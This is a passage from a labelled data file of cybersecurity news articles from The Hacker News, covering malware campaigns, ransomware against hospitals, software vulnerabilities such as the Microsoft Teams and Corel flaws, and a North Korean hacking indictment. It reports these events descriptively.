Trojan that attacks Android smartphones. Upon installation, it collects a wide scope of data, including the handset maker and bookmark copies. Moreover, it modifies the home page of the browser. As a result, hackers have earned some money from the malware by pushing some unwanted advertisements on the compromised Android devices.One of the reasons why the malware has affected such a huge number of Android users is because they do not bother reading privacy agreements. They simply approve these apps, without even reading information on them. Symantec stated it had notified Google of the apps hiding malicious code. However, many of the infected entries were still available on the Android Market as of Friday afternoon. For removal of the malware, Symantec is advising smartphone users to uninstall the infected applications and run a mobile antivirus program. It's time Google started taking security much more seriously. ",Vulnerability Hackers Targeting Critical Healthcare Facilities With Ransomware During Coronavirus Pandemic,https://thehackernews.com/2020/04/ransomware-hospitals-coronavirus.html,"As hospitals around the world are struggling to respond to the coronavirus crisis, cybercriminals—with no conscience and empathy—are continuously targeting healthcare organizations, research facilities, and other governmental organizations with ransomware and malicious information stealers. The new research, published by Palo Alto Networks and shared with The Hacker News, confirmed that ""the threat actors who profit from cybercrime will go to any extent, including targeting organizations that are in the front lines and responding to the pandemic on a daily basis."" While the security firm didn't name the latest victims, it said a Canadian government healthcare organization and a Canadian medical research university both suffered ransomware attacks, as criminal groups seek to exploit the crisis for financial gain. The attacks were detected between March 24 and March 26 and were initiated as part of the coronavirus-themed phishing campaigns that have become widespread in recent months. Palo Alto Networks' disclosure comes as The U.S. Department of Health and Human Services (HHS), biotechnology firm 10x Genomics, Brno University Hospital in the Czech Republic, and Hammersmith Medicines Research have been hit by cyberattacks in the past few weeks. Delivering Ransomware by Exploiting CVE-2012-0158 According to the researchers, the campaign began with malicious emails sent from a spoofed address mimicking the World Health Organization (noreply@who[.]int) that were sent to a number of individuals associated with the healthcare organization that's actively involved in COVID-19 response efforts. The email lures contained a rich text format (RTF) document named ""20200323-sitrep-63-covid-19.doc,"" which, when opened, attempted to deliver EDA2 ransomware by exploiting a known buffer overflow vulnerability (CVE-2012-0158) in Microsoft's ListView / TreeView ActiveX controls in MSCOMCTL.OCX library. ""It is interesting to note that even though the file name clearly references a specific date (March 23, 2020), the file name was not updated over the course of the campaign to reflect current dates,"" Palo Alto Networks researchers noted. ""It is also interesting that the malware authors did not attempt to make their lures appear legitimate in any way; it is clear from the first page of the document that something is amiss."" Upon execution, the ransomware binary contacts the command-and-control (C2) server to download an image that serves as the main ransomware infection notification on the victim's device, and subsequently transmits the host details to create a custom key to encrypt the files on the system's desktop with a "".locked20"" extension. Aside from receiving the key, the infected host uses an HTTP Post request to send the decryption key, encrypted using AES, to the C2 server. Palo Alto Networks ascertained that the ransomware strain was EDA2 based on the code structure of the binary and the host-based and network-based behaviors of the ransomware. EDA2 and Hidden Tear are considered one of the first open-source ransomware that were created for educational purposes but have since been abused by hackers to pursue their own interests. A Spike in Ransomware Incidents The ransomware attacks are a consequence of an increase in other cyberattacks related to the pandemic. They have included a rash of phishing emails that attempt to use the crisis to persuade people to click on links that download malware or ransomware onto their computers. Furthermore, Check Point Research's Brand Phishing Report for Q1 2020 observed a jump in mobile phishing due to people spending more time on their phones for information related to the outbreak and for work. Attackers were found imitating popular services such as Netflix, Airbnb, and Chase Bank to steal login credentials. With hospitals under time constraints and pressure due to the ongoing pandemic, hackers are counting on the organizations to pay ransoms to recover access to critical systems and prevent disruption to patient care. A report released by RisKIQ last week found that ransomware attacks on medical facilities were up 35% between 2016 and 2019, with the average ransom demand being $59,000 across 127 incidents. The cybersecurity firm stated that hackers also favored small hospitals and healthcare centers for reasons ranging from lean security support to increased likelihood of heeding to ransom demands. The spike in ransomware attacks against the medical sector has prompted Interpol to issue a warning about the threat to member countries. ""Cybercriminals are using ransomware to hold hospitals and medical services digitally hostage, preventing them from accessing vital files and systems until a ransom is paid,"" the agency said. To protect the systems from such attacks, Interpol cautioned organizations to watch out for phishing attempts, encrypt sensitive data, and take periodic data backups, aside from storing them offline or on a different network to thwart cybercriminals. ",Cyber_Attack Zero-Click Wormable RCE Vulnerability Reported in Microsoft Teams,https://thehackernews.com/2020/12/zero-click-wormable-rce-vulnerability.html,"A zero-click remote code execution (RCE) bug in Microsoft Teams desktop apps could have allowed an adversary to execute arbitrary code by merely sending a specially-crafted chat message and compromise a target's system. The issues were reported to the Windows maker by Oskars Vegeris, a security engineer from Evolution Gaming, on August 31, 2020, before they were addressed at the end of October. Microsoft did not assign a CVE to this vulnerability, stating ""it's currently Microsoft's policy to not issue CVEs on products that automatically updates without user's interaction."" ""No user interaction is required, exploit executes upon seeing the chat message,"" Vegeris explained in a technical write-up. The result is a ""complete loss of confidentiality and integrity for end users — access to private chats, files, internal network, private keys and personal data outside MS Teams,"" the researcher added. Worse, the RCE is cross-platform — affecting Microsoft Teams for Windows (v1.3.00.21759), Linux (v1.3.00.16851), macOS (v1.3.00.23764), and the web (teams.microsoft.com) — and could be made wormable, meaning it could be propagated by automatically reposting the malicious payload to other channels. This also means the exploit can be passed on from one account to a whole group of users, thereby compromising an entire channel. To achieve this, the exploit chain strings together a cross-site scripting (XSS) flaw present in the Teams '@mentions' functionality and a JavaScript-based RCE payload to post a harmless-looking chat message containing a user mention either in the form of a direct message or to a channel. Simply visiting the chat at the recipient's end leads to the execution of the payload, allowing it to be exploited to log users' SSO tokens to local storage for exfiltration and execute any command of the attacker's choice. This is not the first time such RCE flaws were observed in Teams and other enterprise-focused messaging apps. Chief among them is a separate RCE vulnerability in Microsoft Teams (CVE-2020-17091) that the company patched as part of its November 2020 Patch Tuesday last month. Earlier this August, Vegeris also disclosed a critical ""wormable"" flaw in Slack's desktop version that could have allowed an attacker to take over the system by simply sending a malicious file to another Slack user. Then in September, networking equipment maker Cisco patched a similar flaw in its Jabber video conferencing and messaging app for Windows that, if exploited, could allow an authenticated, remote attacker to execute arbitrary code. ",Vulnerability Corel Software DLL Hijacking Vulnerability Allows Hackers to Execute Malicious Code,https://thehackernews.com/2015/01/corel-software-DLL-hacking.html,"Security researchers have disclosed local zero day DLL hijacking vulnerabilities in several applications developed by Corel Software that could allow an attacker to execute arbitrary commands on victims' computer, potentially affecting more than 100 million users. The security holes were publicly disclosed by Marcos Accossatto from a vulnerability research firm Core Security after the vendor didn't respond to his private disclosure about the flaws. Corel develops wide range of products including graphics, photo, video and other media editing programs. According to the researcher, when a media file associated with one of the vulnerable Corel products is opened, the product also loads a specifically named DLL (Dynamic Link Library) file into memory if it's located in the same directory as the opened media file. These DLL files contain executable code which could allow an attacker to install malware on victims' computers by inserting malicious DLLs into the same directory as the document. ""Given that this is a client-side vulnerability, affected users should avoid opening untrusted files whose extensions are associated with Corel software and contain any of the [affected] DLL files,"" Accossatto said in an advisory. ""When a file associated with the Corel software is opened, the directory of that document is first used to locate DLLs, which could allow an attacker to execute arbitrary commands by inserting malicious DLLs into the same directory as the document."" VULNERABLE COREL PRODUCTS At least eight Corel products are all affected by the vulnerabilities including: CorelDRAW X7 Corel Photo-Paint X7 Corel PaintShop Pro X7 CorelCAD 2014 Corel Painter 2015 Corel PDF Fusion Corel VideoStudio PRO X7 Corel FastFlick Corel was warned of the vulnerabilities in its products on December 9, 2014, followed by another email on December 17, 2014 with a request to confirm receiving the previous message. But there was no response from the vendor. The Core team then contacted the company again via Twitter on January 2, but again received no response, hence disclosed it publicly. STATEMENT FROM TEAM COREL There are no patches available for the vulnerabilities yet. ""Corel is reviewing its products on a case-by-case basis to safeguard dynamic loading of DLL files, which is a common vulnerability in many Windows applications,"" said Jessica Gould, senior communications manager for Corel, in a statement Tuesday. ""Corel makes frequent updates to our applications and these changes have been made a priority for the next update of any affected Corel product. We would like to assure our users that we are not aware of any exploits of this issue with our software."" ",Vulnerability Chinese Hacker Publishes PoC for Remote iOS 12 Jailbreak On iPhone X,https://thehackernews.com/2019/01/ios12-jailbreak-exploit.html,"Here we have great news for all iPhone Jailbreak lovers and concerning one for the rest of iPhone users. A Chinese cybersecurity researcher has today revealed technical details of critical vulnerabilities in Apple Safari web browser and iOS that could allow a remote attacker to jailbreak and compromise victims' iPhoneX running iOS 12.1.2 and before versions. To do so, all an attacker needs to do is trick iPhoneX users into opening a specially crafted web page using Safari browser, that's it. However, finding flaws and creating a working exploit to carry out such attacks is not as easy as it may sound for every iOS hacker. Discovered by security researcher Qixun Zhao of Qihoo 360's Vulcan Team, the exploit takes advantage of two security vulnerabilities that were first demonstrated at TianfuCup hacking contest held in November last year and then was later responsibly reported to the Apple security team. Zhao today released some details of and a proof-of-concept video demonstration for his exploit, which he dubbed ""Chaos,"" after Apple just yesterday released iOS version 12.1.3 to patch the issues. According to the researcher, the remote Jailbreak exploit is a combination of two vulnerabilities, i.e., a type confusion memory corruption flaw (CVE-2019-6227) in Apple's Safari WebKit and a use-after-free memory corruption issue (CVE-2019-6225) in iOS Kernel. As shown in the video demonstration of the Chaos iPhone X jailbreak exploit, the Safari flaw allowed maliciously crafted web content to execute arbitrary code on the targeted device, which then used the second bug to elevate privileges and install a malicious application silently. However, the researcher has chosen not to publish the code for iOS jailbreak in an attempt to prevent malicious attacks against Apple users and hopes that the jailbreak community would use this information to soon come up with a suitable jailbreak exploit for users. ""I will not release the exploit code, if you want to jailbreak, you will need to complete the exploit code yourself or wait for the jailbreak community's release. At the same time, I will not mention the exploit details of the post exploit, as this is handled by the jailbreak community,"" Zhao said. At this moment, based upon the remote nature of this attack and wide threat surface, it is highly recommended for iPhone users to install the latest iOS update as soon as possible, rather waiting for a jailbreak. ",Vulnerability BitTorrent Forum Hacked; Change your Password Immediately,https://thehackernews.com/2016/06/utorrent-hacked.html,"If you are a torrent lover and have registered on BitTorrent community forum website, then you may have had your personal details compromised, along with your hashed passwords. The BitTorrent team has announced that its community forums have been hacked, which exposed private information of hundreds of thousands of its users. As of now, BitTorrent is the most visited torrent client around the world with more than 150 Million monthly active users. Besides this, BitTorrent also has a dedicated community forum that has over hundreds of thousands of registered members with tens of thousands of daily visitors. A recent security alert by the team says the forum database has been compromised by hackers who were able to get their hands on its users' passwords, warning its users to update their passwords as soon as possible. The vulnerability is believed to be originated at one of its vendors, who alerted the BitTorrent team about the issue earlier this week. ""The vulnerability appears to have been through one of the vendor's other clients. However, it allowed attackers to access some information on other accounts,"" μTorrent forum writes ""As a result, attackers were able to download a list of our forum users."" BitTorrent and other torrent forums are also using Invision Power Board software and if the unnamed vendor in question is Invision Power Services Inc., then hundreds of popular discussion forums might have also been affected. The team is also investigating further to learn if any other information of its users was accessed. Security researcher Troy Hunt somehow got access to the stolen database and which he has already been uploaded to his Data breach Notification Site: Have I Been Pwned, which includes 34,000 BitTorrent Forum users' email addresses, usernames, IP addresses, and salted SHA1 hashed passwords. All users are strongly advised to change their forum passwords as well as passwords for other sites, in case they are using identical to the one used on the forum. Update: μTorrent forum not hacked. I mistakenly named μTorrent previously, instead of BitTorrent. As soon as we realized it, I have updated this article with correct information. ",Data_Breaches BRATA Malware Poses as Android Security Scanners on Google Play Store,https://thehackernews.com/2021/04/brata-malware-poses-as-android-security.html,"A new set of malicious Android apps have been caught posing as app security scanners on the official Play Store to distribute a backdoor capable of gathering sensitive information. ""These malicious apps urge users to update Chrome, WhatsApp, or a PDF reader, yet instead of updating the app in question, they take full control of the device by abusing accessibility services,"" cybersecurity firm McAfee said in an analysis published on Monday. The apps in question were designed to target users in Brazil, Spain, and the U.S., with most of them accruing anywhere between 1,000 to 5,000 installs. Another app named DefenseScreen racked up 10,000 installs before it was removed from the Play Store last year. First documented by Kaspersky in August 2019, BRATA (short for ""Brazilian Remote Access Tool Android"") emerged as an Android malware with screen recording abilities before steadily morphing into a banking trojan. ""It combines full device control capabilities with the ability to display phishing webpages that steal banking credentials in addition to abilities that allow it capture screen lock credentials (PIN, Password or Pattern), capture keystrokes (keylogger functionality), and record the screen of the infected device to monitor a user's actions without their consent,"" McAfee researchers Fernando Ruiz and Carlos Castillo said. The apps that distribute the backdoor alert unsuspecting users of a security issue on their devices, prompting them to install a fake update of a specific app (e.g., Google Chrome, WhatsApp, and a non-existent PDF reader app) to address the problem. Once the victim agrees to install the app, BRATA requests permissions to access the device's accessibility service, abusing it to capture lock screen PIN (or password/pattern), record keystrokes, take screenshots, and even disable the Google Play Store. By disabling the Play Store app, the idea is also to disable Play Protect, a feature that preemptively runs a safety check on apps before they are downloaded from the app store, and routinely scans Android devices for potentially harmful apps and removes them. Interestingly, new versions of BRATA also come equipped with added obfuscation and encryption layers, besides moving most of the core functionality to a remote attacker-controlled server, in turn allowing the attackers to easily update the malware and exploit the devices they were installed on while staying under the radar. ""BRATA is just another example of how powerful the (ab)use of accessibility services is and how, with just a little bit of social engineering and persistence, cybercriminals can trick users into granting this access to a malicious app and basically getting total control of the infected device,"" the researchers concluded. ""By stealing the PIN, Password or Pattern, combined with the ability to record the screen, click on any button and intercept anything that is entered in an editable field, malware authors can virtually get any data they want, including banking credentials via phishing web pages or even directly from the apps themselves, while also hiding all these actions from the user."" ",Malware Researchers Uncover Hacking Operations Targeting Government Entities in South Korea,https://thehackernews.com/2021/06/researchers-uncover-hacking-operations.html,"A North Korean threat actor active since 2012 has been behind a new espionage campaign targeting high-profile government officials associated with its southern counterpart to install an Android and Windows backdoor for collecting sensitive information. Cybersecurity firm Malwarebytes attributed the activity to a threat actor tracked as Kimsuky, with the targeted entities comprising of the Ministry of Foreign Affairs, Ambassador of the Embassy of Sri Lanka to the State, International Atomic Energy Agency (IAEA) Nuclear Security Officer, and the Deputy Consul General at Korean Consulate General in Hong Kong. The attacks also involved collecting information about other organizations and universities in the country, including the Korea Internet and Security Agency (KISA), Seoul National University, and Daishin Securities. Malwarebytes, however, noted that there is no evidence of active targeting or compromise by the adversary. The development is only the latest in a series of surveillance efforts aimed at South Korea. Believed to be operating on behalf of the North Korean regime, Kimsuky (aka Velvet Chollima, Black Banshee, and Thallium) has a track record of singling out South Korean entities while expanding their victimology to the U.S., Russia, and various nations in Europe. Last November, the adversary was linked to a new modular spyware suite called ""KGH_SPY,"" which allows it to carry out reconnaissance of target networks, log keystrokes, and steal confidential information, as well as a stealthy malware under the name ""CSPY Downloader"" that's designed to thwart analysis and download additional payloads. Kimsuky's attack infrastructure consists of various phishing websites that mimic well known websites such as Gmail, Microsoft Outlook, and Telegram with an aim to trick victims into entering their credentials. ""This is one of the main methods used by this actor to collect email addresses that later will be used to send spear-phishing emails,"" Malwarebytes researcher Hossein Jazi said. In using social engineering as a core component of its operations, the goal is to distribute a malware dropper that takes the form of a ZIP archive file attached to the emails, which ultimately leads to the deployment of an encoded DLL payload called AppleSeed, a backdoor that's been put to use by Kimsuky as early as 2019. ""Besides using the AppleSeed backdoor to target Windows users, the actor also has used an Android backdoor to target Android users,"" Jazi noted. ""The Android backdoor can be considered as the mobile variant of the AppleSeed backdoor. It uses the same command patterns as the Windows one. Also, both Android and Windows backdoors have used the same infrastructure."" AppleSeed has all the hallmarks of a typical backdoor, with myriad capabilities to record keystrokes, capture screenshots, collect documents with specific extensions (.txt, .ppt, .hwp, .pdf, and .doc), and gather data from removable media devices connected to the machine, all of which are then uploaded to a remote command-and-control server. But perhaps the most interesting discovery of all is that the threat actor calls themselves Thallium in the malware source code, which is the moniker assigned by Microsoft based on its tradition of naming nation-state hacking groups after chemical elements. ",Cyber_Attack ASLR bypass techniques are popular with APT attacks,https://thehackernews.com/2013/10/aslr-bypass-techniques-are-popular-with.html,"Address space layout randomization (ASLR) is a security technique involved in protection from buffer overflow attacks. Many recent APT (Advanced Persistent Threat) attacks have utilized many different ASLR bypass techniques during the past year, according to Researchers at FireEye. Many exploits and malware attacks rely on the ability of the programmer to accurately identify where specific processes or system functions reside in memory. In order for an attacker to exploit or leverage a function, they must first be able to tell their code where to find the function or process to exploit. The goal of ASLR is to introduce randomness into addresses used by a given task. It involves randomly arranging the positions of key data areas of a program, including the base of the executable and the positions of the stack, heap, and libraries, in a process's address space. Today a lot of attention is brought to client side exploits especially inside web browsers. Normally the exploitation is done through the oldest known method of spraying the heap. According to Researchers, the easiest and most popular way to defeat ASLR protection is - loading a non-ASLR module. Such attacks were recently used in Internet Explorer (IE) Zero-Day Exploit CVE-2013-3893 and some other vulnerabilities i.e. CVE2013-1347, CVE-2012-4969, CVE-2012-4792. But there is a limitation that the non-ASLR module technique requires that IE 8 and IE 9 must be running with old software such as JRE 1.6, Office 2007/2010. Another ASLR bypass technique involves the modification of the BSTR length/null terminator. But this technique only applies to specific types of vulnerabilities that can overwrite memory, such as buffer overflow, arbitrary memory write, and increasing/decreasing the content of a memory pointer. The Adobe XFA 0day exploit (CVE-2013-0640) uses this technique to find the AcroForm.api base address and builds a ROP chain dynamically to bypass ASLR and DEP. ""The good thing about these types of vulnerabilities is that they can corrupt the length of a BSTR such that using the BSTR can access memory outside of its original boundaries. Such accesses may disclose memory addresses that can be used to pinpoint libraries suitable for ROP. Once the exploit has bypassed ASLR in this way, it may then use the same memory corruption bug to control EIP."" According to Microsoft, these types of bugs typically use JavaScript to trigger the flaw, as well as heap-spray to abuse the memory, and bypass ASLR. ASLR bypassing has become more and more common in Zero-Day attacks. ",Vulnerability Phony Call Centers Tricking Users Into Installing Ransomware and Data-Stealers,https://thehackernews.com/2021/07/phony-call-centers-tricking-users-into.html,"An ongoing malicious campaign that employs phony call centers has been found to trick victims into downloading malware capable of data exfiltration as well as deploying ransomware on infected systems. The attacks — dubbed ""BazaCall"" — eschew traditional social engineering techniques that rely on rogue URLs and malware-laced documents in favor of a vishing-like method wherein targeted users are sent email messages informing them of a forthcoming subscription charge unless they call a specific phone number. By tricking the recipients into calling the number, the unsuspecting victims are connected with an actual human operator at a fraudulent call center, who then provides them with instructions to download the BazaLoader malware. BazaLoader (aka BazarBackdoor) is a C++-based downloader with the ability to install various types of malicious programs on infected computers, including deploying ransomware and other malware to steal sensitive data from victimized systems. First observed in April 2020, BazaLoader campaigns have been used by multiple threat actors and frequently serves as a loader for disruptive malware such as Ryuk and Conti ransomware. BazaCall Attack Flow ""Attacks emanating from the BazaCall threat could move quickly within a network, conduct extensive data exfiltration and credential theft, and distribute ransomware within 48 hours of the initial compromise,"" Microsoft 365 Defender Threat Intelligence Team said in a report published Thursday. Because the malware isn't distributed via a link or document within the message body itself, the lures add a level of difficulty that enables attackers to evade phishing and malware detection software. This campaign is part of a broader trend in which BazaLoader-affiliated criminals use call centers — the operators seemingly non-native English speakers — as part of an intricate attack chain. Post-Compromise Activities Earlier this May, Palo Alto Networks and Proofpoint revealed an elaborate infection mechanism that leveraged websites associated with fake ebooks (World Books) and movie streaming subscription services (BravoMovies) as a stepping stone to deliver rigged Excel spreadsheets containing the BazaLoader malware. The latest attack disclosed by Microsoft is no different in that the call center agent serves as a conduit, urging the caller to navigate to a recipe website (""topcooks[.]us"") in order to cancel the non-existent trial subscription. ""The use of another human element in BazaCall's attack chain through the above mentioned hands-on-keyboard control further makes this threat more dangerous and more evasive than traditional, automated malware attacks,"" the researchers said. ""BazaCall campaigns highlight the importance of cross-domain optics and the ability to correlate events in building a comprehensive defense against complex threats."" ",Malware Malicious Android application stealing banking credentials,https://thehackernews.com/2012/03/malicious-android-application-stealing.html,"Malicious Android application stealing banking credentials A new form of smart Android malware can not only steal your online banking information, but update itself in the future and secretly send contact information stored on your device off to the Bad Guys. Security researchers at McAfee have discovered a malicious Android application capable of grabbing banking passwords from a mobile device without infecting the user's computer. From a McAfee blog post on the subject, penned by Malware Researcher Carlos Castillo: ""To get the fake token, the user must enter the first factor of authentication (used to obtain initial access to the banking account). If this action is not performed, the application shows an error. When the user clicks ""Generar"" (Generate), the malware shows the fake token (which is in fact a random number) and sends the password to a specific cell phone number along with the device identifiers (IMEI and IMSI). The same information is also sent to one of the control servers along with further data such as the phone number of the device."" The app also includes a number of nasty lines of code that could be used to obtain users' contact lists and then send them off to a control server. ""From man-in-the-middle attacks we now see more sophisticated, remote-controlled banking Trojans that can get more than one factor of authentication and update itself to, for example, modify a phishing attack to get other required credentials–such as the name or the ID number of the user–to perform electronic fraud,"" writes Castillo. ""Due to the increasing popularity of Android and mobile-banking applications, we expect that more threats like this will appear."" If Mobile banking does take off, beware, since the Android security architecture won't be able to stop those types of attacks, given the ease with which users can be tricked, via social engineering attacks, into installing third-party applications. ",Malware Microsoft Patches Windows Zero-Day Flaw Disclosed by Google,https://thehackernews.com/2016/11/microsoft-windows-update.html,"Microsoft was very upset with Google last week when its Threat Analysis Group publically disclosed a critical Windows kernel vulnerability (CVE-2016-7255) that had yet to be patched. The company criticized Google's move, claiming that the disclosure of the vulnerability, which was being exploited in the wild, put its customers ""at potential risk."" The vulnerability affects all Windows versions from Windows Vista through current versions of Windows 10, and Microsoft was set to issue a fix come this month's Patch Tuesday. So, as part of its monthly Patch Tuesday, Microsoft today patched the security flaw in Windows that was actively being exploited by hackers. According to Microsoft's security bulletin released today, any hacker who tricked victims into running a ""specially-crafted application"" could successfully exploit the system bug and gain the ability to ""install programs; view, change, or delete data; or create new accounts with full user rights."" Once exploited, the bug could be used to escape the sandbox protection and execute malicious code on the compromised Windows machine. Rated as ""important,"" the vulnerability was being exploited by Strontium group, also known as Fancy Bear, Sofacy, and APT 28, in targeted attacks. Fancy Bear is the same group of hackers that has also been accused by the US Intelligence community of hacking the Democratic National Committee, Clinton Campaign Chair John Podesta, and former Secretary of State Colin Powell, among others. Besides this controversial flaw exposed by Google last week, the security bulletin also fixes multiple elevation of privilege bugs. Patch Tuesday also contains several critical security patches that affect all versions of Windows as well as other important updates and fixes for both Internet Explorer and Edge. So, I strongly recommend home users and companies to ensure that their Windows PC is up-to-date with all of Microsoft's latest security fixes as of today. ",Vulnerability U.S. Charges 3 North Korean Hackers Over $1.3 Billion Cryptocurrency Heist,https://thehackernews.com/2021/02/us-charges-3-north-korean-hackers-over.html,"The U.S. Department of Justice (DoJ) on Wednesday indicted three suspected North Korean hackers for allegedly conspiring to steal and extort over $1.3 billion in cash and cryptocurrencies from financial institutions and businesses. The three defendants — Jon Chang Hyok, 31; Kim Il, 27; and Park Jin Hyok, 36 — are said to be members of the Reconnaissance General Bureau, a military intelligence division of North Korea, also known as the Lazarus group, Hidden Cobra, or Advanced Persistent Threat 38 (APT 38). Accusing them of creating and deploying multiple malicious cryptocurrency applications, developing and fraudulently marketing a blockchain platform, the indictment expands on the 2018 charges brought against Park, one of the alleged nation-state hackers previously charged in connection with the 2014 cyberattack on Sony Pictures Entertainment. A Wide-Ranging Scheme to Commit Cyberattacks and Financial Crimes ""North Korea's operatives, using keyboards rather than guns, stealing digital wallets of cryptocurrency instead of sacks of cash, are the world's leading bank robbers,"" said Assistant Attorney General John C. Demers of the Justice Department's National Security Division. ""The Department will continue to confront malicious nation state cyber activity with our unique tools and work with our fellow agencies and the family of norms abiding nations to do the same."" The latest indictment is yet another sign of how the Lazarus Group relies on cyber cryptocurrency heists and cybertheft against businesses and critical infrastructure in order to fund a country that's been heavily hit by economic sanctions. The group, which earned a place in the U.S. government's sanctions list in 2019, has been linked into a wide array of criminal cyber activities, both in the U.S. and abroad, including the destructive WannaCry ransomware outbreak of 2017, the SWIFT attacks on banks and ATM networks to steal more than $1.2 billion, conducting spear-phishing campaigns, and carrying out cryptocurrency thefts amounting to at least $112 million. Interestingly, the indictment also details the defendants' plans to create their own crypto-token called Marine Chain in 2017-18, which would let users purchase stakes in shipping vessels, but in reality, was a money-making initiative aimed at secretly obtaining funds for the government while evading international sanctions. ""AppleJeus"" Backdoor to Steal Cryptocurrency Also undertaken by the conspiracy is a scheme that involved creating malicious applications that masqueraded as legitimate cryptocurrency trading platforms, only to use them as a backdoor to transfer money to their accounts fraudulently. Calling the backdoor ""AppleJeus,"" the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said it discovered at least seven different versions of the malware since 2018, with the Lazarus Group banking on a mix of phishing, social networking, and social engineering techniques as initial infection vectors to trick users into downloading it. The rogue applications identified by CISA comprises of Ants2Whale, Celas Trade Pro, CoinGo Trade, CryptoNeuro Trader, Dorusio, iCryptoFx, Kupay Wallet, Union Crypto Trader, and WorldBit-Bot. Energy, finance, government, industry, technology, and telecommunications sectors were the prominent focus of the attacks, the agency detailed, adding AppleJeus targets both Windows and Mac operating systems, echoing a previous August 2018 report from cybersecurity firm Kaspersky. Canadian-American Citizen Charged for Money Laundering U.S. prosecutors said the three men were stationed by the North Korean government in other countries such as China and Russia with the goal of furthering the strategic and financial interests of the Kim Jong Un-led regime. The DoJ, however, did not elaborate on whether threat actors from either country collaborated with the North Korean operatives on these attacks. In a related development, the U.S. Federal Bureau of Investigation (FBI) obtained warrants to seize cryptocurrencies totaling approximately $1.9 million that were allegedly plundered from an unnamed financial services company in New York and held at two cryptocurrency exchanges. A second case that was also unsealed yesterday concerned a Canadian-American citizen named Ghaleb Alaumary, who pled guilty in a money-laundering scheme and admitted to carrying out ATM ""cash-out"" operations and a cyber-enabled bank heist orchestrated by North Korean hackers. Although the individuals are unlikely to be extradited and brought to trial, Jon, Kim, and Park are charged with one count of conspiracy to commit computer fraud and abuse and one count of conspiracy to commit wire fraud and bank fraud. Alaumary has been charged with one count of conspiracy to commit money laundering, which carries a maximum sentence of 20 years in prison. ""The scope of the criminal conduct by the North Korean hackers was extensive and long-running, and the range of crimes they have committed is staggering,"" said Acting U.S. Attorney Tracy L. Wilkison for the Central District of California. ""The conduct detailed in the indictment are the acts of a criminal nation-state that has stopped at nothing to extract revenge and obtain money to prop up its regime."" ",Cyber_Attack Dangerous 'Vawtrak Banking Trojan' Harvesting Passwords Worldwide,https://thehackernews.com/2015/03/vawtrak-banking-trojan.html,"Security researcher has discovered some new features in the most dangerous Vawtrak, aka Neverquest, malware that allow it to send and receive data through encrypted favicons distributed over the secured Tor network. The researcher, Jakub Kroustek from AVG anti-virus firm, has provided an in-depth analysis (PDF) on the new and complex set of features of the malware which is considered to be one of the most dangerous threats in existence. Vawtrak is a sophisticated piece of malware in terms of supported features. It is capable of stealing financial information and executing transactions from the compromised computer remotely without leaving traces. The features include videos and screenshots capturing and launching man-in-the-middle attacks. HOW VAWTRAK SPREADS ? AVG anti-virus firm is warning users that it has discovered an ongoing campaign delivering Vawtrak to gain access to bank accounts visited by the victim and using the infamous Pony module in order to steal a wide range of victims' login credentials. The Vawtrak Banking Trojan spreads by using one of the three ways: Drive-by download – spam email attachments or links to compromised sites Malware downloader – like Zemot or Chaintor Exploit kit – like as Angler Exploit Kit LATEST FEATURES According to the researcher, Vawtrak is using the Tor2Web proxy to receive updates from its developers. ""Of particular interest from a security standpoint is that by using Tor2web proxy, it can access update servers that are hosted on the Tor hidden web services without installing specialist software such as Torbrowser,"" Kroustek says. ""Moreover, the communication with the remote server is done over SSL, which adds further encryption."" The latest Vawtrak sample uses steganography to hide update files within favicons in order to conceal the malicious downloads. Favicons are the small images used by the websites to add icon to website bookmarks and browser tabs. Once executed in the victim's machine, Vawtrak performs the following actions: Disables antivirus protection. Inject custom code in a user-displayed web pages (this is mostly related to online banking) Steals passwords, digital certificates, browser history, and cookies. Surveillance of the victim (key logging, taking screenshots, capturing video) Creates a remote access to a user's machine (VNC, SOCKS) Automatic updating. Vawtrak supports three major browsers to operate in – Internet Explorer, Firefox, and Chrome. It also supports password stealing from the other browsers. AFFECTED COUNTRIES Based on their statistics, Vawktrak is infecting banking, gaming and social network users mainly across the countries including United Kingdom, the United States, and Germany. Although, users in Australia, New Zealand, and across Europe are also affected. AVG concluded following their analysis of the malware that ""Vawtrak is like a Swiss Army knife for its operators because of its wide range of applications and available features."" ",Malware Newly Discovered Mac Malware with Ancient Code Spying on Biotech Firms,https://thehackernews.com/2017/01/mac-os-malware.html,"Security researchers have discovered a rare piece of Mac-based espionage malware that relies on outdated coding practices but has been used in some previous real-world attacks to spy on biomedical research center computers. Dubbed Fruitfly, the malware has remained undetected for years on macOS systems despite using unsophisticated and ""antiquated code."" Infosec firm Malwarebytes discovered Fruitfly, detected as 'OSX.Backdoor.Quimitchin,' after one of its IT administrators spotted some unusual outgoing activity from a particular Mac computer. According to the researchers, the recently discovered what they're calling ""the first Mac malware of 2017"" contains code that dates before OS X, which has reportedly been conducting detailed surveillance operation on targeted networks, possibly for over two years. Fruitfly uses a hidden pearl script to communicate back to two command-and-control (C&C) servers and has the ability to perform actions like capturing webcam and screenshots from both Mac and Linux systems, grabbing the system's uptime, and moving and clicking a mouse cursor. Fruitfly can also collect information about other devices connected to the same network as the infected Mac, and then tries to connect to them, according to a blog post published by Malwarebytes. The malware also uses a secondary script and Java class to hide its icon from showing in the macOS Dock, though it's still unclear how the malware got distributed and infected the machines. What's more interesting is that the malware uses code that pre-dates Apple's OS X operating system, including SGGetChannelDeviceList, SGSetChannelDevice, SGSetChannelDeviceInput, and SGStartRecord. Researchers said the malware is even running open-source ""libjpeg"" code to open or create JPEG-formatted image files, which was last updated in 1998. On further digging into the code, the researchers discovered the malware had even gone through changes to ""support"" Mac OS X Yosemite indicating Fruitfly is at least two years old. However, the old code and upgrade to support Mac Yosemite do not indicate the exact creation date of the malware. ""The only reason I can think of that this malware has not been spotted before now is that it's being used in very tightly targeted attacks, limiting its exposure,"" Thomas Reed of Malwarebytes wrote in the post. ""There have been [many] stories over the past few years about Chinese and Russian hackers targeting and stealing the United States and European scientific research. Although there is no evidence at this point linking this malware to a specific group, the fact that it has been seen specifically at biomedical research institutions certainly seems like it could be the result of exactly that kind of espionage."" The Fruitfly's code even includes Linux shell commands that show signs of the malware potentially running just fine on Linux operating system. So, it would come as no surprise if a Linux variant of Fruitfly was in operation. Reed also said he has also come across related Windows executables that connected to the same C&C server used by the Fruitfly malware but date back to at least 2013. However, the good news is that Apple has released an update for macOS to address Fruitfly. Although Apple automatically pushes the update, Mac users should consider checking their systems for infections, which is actually known as OSX.Backdoor.Quimitchip. ",Malware Critical 'Port Fail' Vulnerability Reveals Real IP Addresses of VPN Users,https://thehackernews.com/2015/11/vpn-hacking.html,"A newly discovered flaw affecting all VPN protocols and operating systems has the capability to reveal the real 